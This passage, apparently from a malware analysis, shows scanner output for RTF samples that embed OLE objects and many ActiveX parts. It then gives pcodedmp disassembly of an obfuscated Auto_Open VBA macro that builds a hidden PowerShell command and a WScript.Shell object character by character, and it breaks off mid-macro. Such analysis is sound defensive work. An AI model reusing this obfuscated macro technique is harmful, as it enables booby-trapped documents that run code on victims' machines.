                           -ScanObject("ARCHIVE_FS" (5:"XML",470,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX5.xml")
                           -ScanObject("ARCHIVE_FS" (1:"OLE2",2095616,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin")
                                  -ScanObject("OLE2_FS" (0:"UNKNOWN",106,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX52.bin|Root ntry/Contents")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX6.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX7.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",471,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX8.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",472,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/activeX9.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX1.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX10.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX11.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX12.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX13.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX14.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX15.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX16.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX17.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX18.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX19.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX2.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX20.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX21.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX22.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX23.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX24.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX25.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX26.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX27.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX28.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX29.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX3.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX30.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX31.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX32.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX33.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX34.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX35.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX36.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX37.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX38.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX39.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX4.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",396,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX40.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX5.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX6.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX7.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX8.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",328,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX9.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",14898,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1297,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
                           -ScanObject("ARCHIVE_FS" (0:"UNKNOWN",664,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/media/image1.wmf")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1846,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",17304,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",6992,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",304,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",6537,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
                           -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",590,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",6,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_2|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
       -ScanObject("GENERIC_FS" (0:"UNKNOWN",14,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|object_3")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",70,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_4")
              -ScanObject("MEM_FS" (31:"HEX",1,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_4|RTFOLEOBJECT|otkloadr.wrloader.1")
                     -ScanObject("MEM_FS" (0:"UNKNOWN",0,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_4|RTFOLEOBJECT|otkloadr.wrloader.1|HEX")
       -ScanObject("GENERIC_FS" (1:"OLE2",518,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objdata_5")
       -ScanObject("GENERIC_FS" (21:"TEXT",48,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|objclass_6")
       -ScanObject("GENERIC_FS" (21:"TEXT",22,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|generator_7")
       -ScanObject("GENERIC_FS" (0:"UNKNOWN",60,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|falt_8")
       -ScanObject("GENERIC_FS" (31:"HEX",420,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|panose_9")
              -ScanObject("MEM_FS" (0:"UNKNOWN",210,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|panose_9|HEX")
       -ScanObject("GENERIC_FS" (21:"TEXT",175,"72b14306c9f95536d03d88cf63204f70630dd9cd00664ad7f86c1d774c8508e9|fonttbl_10")

 

Full example of Sample 2

                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX26.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX27.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX28.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX29.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX3.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX30.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX31.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX32.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX33.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX34.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX35.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX36.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX37.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX38.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX39.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX4.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX40.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX5.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX6.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX7.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX8.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",292,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/activeX/_rels/activeX9.xml.rels")
                           -ScanObject("ARCHIVE_FS" (5:"XML",12878,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/document.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",1261,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/fontTable.xml")
                           -ScanObject("ARCHIVE_FS" (0:"UNKNOWN",222,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/media/image1.wmf")
                           -ScanObject("ARCHIVE_FS" (5:"XML",2519,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/settings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",28676,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/styles.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",6795,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/theme/theme1.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",497,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/webSettings.xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",6537,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|word/_rels/document.xml.rels")
                           -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                           -ScanObject("ARCHIVE_FS" (5:"XML",590,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/Package|_rels/.rels")
                     -ScanObject("OLE2_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|objdata_1|RTFOLEOBJECT|word.document.12|Root Entry/.ObjInfo")
       -ScanObject("GENERIC_FS" (21:"TEXT",32,"d9fac68b6c49c485675d9141f375799d10572999|objclass_2")
       -ScanObject("GENERIC_FS" (0:"UNKNOWN",45,"d9fac68b6c49c485675d9141f375799d10572999|objdata_3")
       -ScanObject("GENERIC_FS" (21:"TEXT",38,"d9fac68b6c49c485675d9141f375799d10572999|oleclsid_4")
       -ScanObject("GENERIC_FS" (32:"OLEOBJ",1592,"d9fac68b6c49c485675d9141f375799d10572999|datastore_5")
              -ScanObject("MEM_FS" (1:"OLE2",1536,"d9fac68b6c49c485675d9141f375799d10572999|datastore_5|RTFOLEOBJECT|msxml2.saxxmlreader.5.0")
       -ScanObject("GENERIC_FS" (21:"TEXT",2521,"d9fac68b6c49c485675d9141f375799d10572999|lsdlockedexcept_6")
       -ScanObject("GENERIC_FS" (31:"HEX",628,"d9fac68b6c49c485675d9141f375799d10572999|colorschememapping_7")
              -ScanObject("MEM_FS" (5:"XML",314,"d9fac68b6c49c485675d9141f375799d10572999|colorschememapping_7|HEX")
       -ScanObject("GENERIC_FS" (31:"HEX",6162,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8")
              -ScanObject("MEM_FS" (7:"ZIP",3081,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX")
                     -CouldNotScanObject("ARCHIVE_FS","[Content_Types].xml")
                     -ScanObject("ARCHIVE_FS" (5:"XML",310,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|_rels/.rels")
                     -ScanObject("ARCHIVE_FS" (5:"XML",138,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|theme/theme/themeManager.xml")
                     -ScanObject("ARCHIVE_FS" (5:"XML",6992,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|theme/theme/theme1.xml")
                     -ScanObject("ARCHIVE_FS" (5:"XML",283,"d9fac68b6c49c485675d9141f375799d10572999|themedata_8|HEX|theme/theme/_rels/themeManager.xml.rels")
       -ScanObject("GENERIC_FS" (21:"TEXT",1060,"d9fac68b6c49c485675d9141f375799d10572999|dptxbxtext_9")
       -ScanObject("GENERIC_FS" (21:"TEXT",1060,"d9fac68b6c49c485675d9141f375799d10572999|shptxt_10")
       -ScanObject("GENERIC_FS" (31:"HEX",244,"d9fac68b6c49c485675d9141f375799d10572999|sv_11")
              -ScanObject("MEM_FS" (0:"UNKNOWN",122,"d9fac68b6c49c485675d9141f375799d10572999|sv_11|HEX")
       -ScanObject("GENERIC_FS" (27:"BASE64",570,"d9fac68b6c49c485675d9141f375799d10572999|sn_12")
              -ScanObject("MEM_FS" (0:"UNKNOWN",426,"d9fac68b6c49c485675d9141f375799d10572999|sn_12|B64")
       -ScanObject("GENERIC_FS" (21:"TEXT",5,"d9fac68b6c49c485675d9141f375799d10572999|pntxtb_13")
       -ScanObject("GENERIC_FS" (21:"TEXT",9,"d9fac68b6c49c485675d9141f375799d10572999|pntxta_14")
       -ScanObject("GENERIC_FS" (31:"HEX",4,"d9fac68b6c49c485675d9141f375799d10572999|wgrffmtfilter_15")
              -ScanObject("MEM_FS" (21:"TEXT",2,"d9fac68b6c49c485675d9141f375799d10572999|wgrffmtfilter_15|HEX")
       -ScanObject("GENERIC_FS" (21:"TEXT",52,"d9fac68b6c49c485675d9141f375799d10572999|xmlnstbl_16")
       -ScanObject("GENERIC_FS" (27:"BASE64",12,"d9fac68b6c49c485675d9141f375799d10572999|operator_17")
              -ScanObject("MEM_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|operator_17|B64")
       -ScanObject("GENERIC_FS" (27:"BASE64",12,"d9fac68b6c49c485675d9141f375799d10572999|author_18")
              -ScanObject("MEM_FS" (0:"UNKNOWN",6,"d9fac68b6c49c485675d9141f375799d10572999|author_18|B64")
       -ScanObject("GENERIC_FS" (21:"TEXT",43,"d9fac68b6c49c485675d9141f375799d10572999|stylesheet_19")
       -ScanObject("GENERIC_FS" (21:"TEXT",17,"d9fac68b6c49c485675d9141f375799d10572999|colortbl_20")
       -ScanObject("GENERIC_FS" (27:"BASE64",36,"d9fac68b6c49c485675d9141f375799d10572999|falt_21")
              -ScanObject("MEM_FS" (0:"UNKNOWN",27,"d9fac68b6c49c485675d9141f375799d10572999|falt_21|B64")
       -ScanObject("GENERIC_FS" (31:"HEX",280,"d9fac68b6c49c485675d9141f375799d10572999|panose_22")
              -ScanObject("MEM_FS" (0:"UNKNOWN",140,"d9fac68b6c49c485675d9141f375799d10572999|panose_22|HEX")
       -ScanObject("GENERIC_FS" (0:"UNKNOWN",1618,"d9fac68b6c49c485675d9141f375799d10572999|fonttbl_23")
       -ScanObject("GENERIC_FS" (21:"TEXT",4167,"d9fac68b6c49c485675d9141f375799d10572999|rtf_24")

Full pcodedmp output of sample 3:

Macros/VBA/ThisDocument - 10363 bytes
Line #0:
       FuncDefn (Sub Auto_Open())
Line #1:
       Dim
       VarDefn omVsI
Line #2:
       LineCont 0x0028 19 00 00 00 1B 00 00 00 1D 00 00 00 1F 00 00 00 21 00 00 00 23 00 00 00 25 00 00 00 27 00 00 00 29 00 00 00 2B 00 00 00
       LitStr 0x0063 " /w 1 /C "s''v Td -;s''v QYI e''c;s''v HI ((g''v Td).value.toString()+(g''v QYI).value.toString());"
       LitStr 0x0001 "p"
       Concat
       LitStr 0x0001 "o"
       Concat
       LitStr 0x0001 "w"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "r"
       Concat
       LitStr 0x0001 "s"
       Concat
       LitStr 0x0001 "h"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "l"
       Concat
       LitStr 0x0001 "l"
       Concat
       St omVsI
Line #3:
Line #4:
       Dim
       VarDefn GhHqwBBoV
Line #5:
       LitStr 0x0001 "S"
       LitStr 0x0001 "h"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "l"
       Concat
       LitStr 0x0001 "l"
       Concat
       St GhHqwBBoV
Line #6:
       Dim
       VarDefn TWgKXCEMpLNvAkL
Line #7:
       LitStr 0x0001 "W"
       LitStr 0x0001 "S"
       Concat
       LitStr 0x0001 "c"
       Concat
       LitStr 0x0001 "r"
       Concat
       LitStr 0x0001 "i"
       Concat
       LitStr 0x0001 "p"
       Concat
       LitStr 0x0001 "t"
       Concat
       St TWgKXCEMpLNvAkL
Line #8:
       Dim
       VarDefn duWktH
Line #9:
       Ld TWgKXCEMpLNvAkL
       LitStr 0x0001 "."
       Concat
       Ld GhHqwBBoV
       Concat
       St duWktH
Line #10:
       Dim
       VarDefn zomnqaCVeYJhMzN
Line #11:
       Dim
       VarDefn ifZKwUg
Line #12:
       SetStmt
       Ld duWktH
       Ld VBA
       ArgsMemLd CreateObject 0x0001
       Set zomnqaCVeYJhMzN
Line #13:
       Dim
       VarDefn hCiSSPdnGWigF
Line #14:
       LitStr 0x0001 "p"
       LitStr 0x0001 "o"
       Concat
       LitStr 0x0001 "w"
       Concat
       LitStr 0x0001 "e"
       Concat
       LitStr 0x0001 "r"
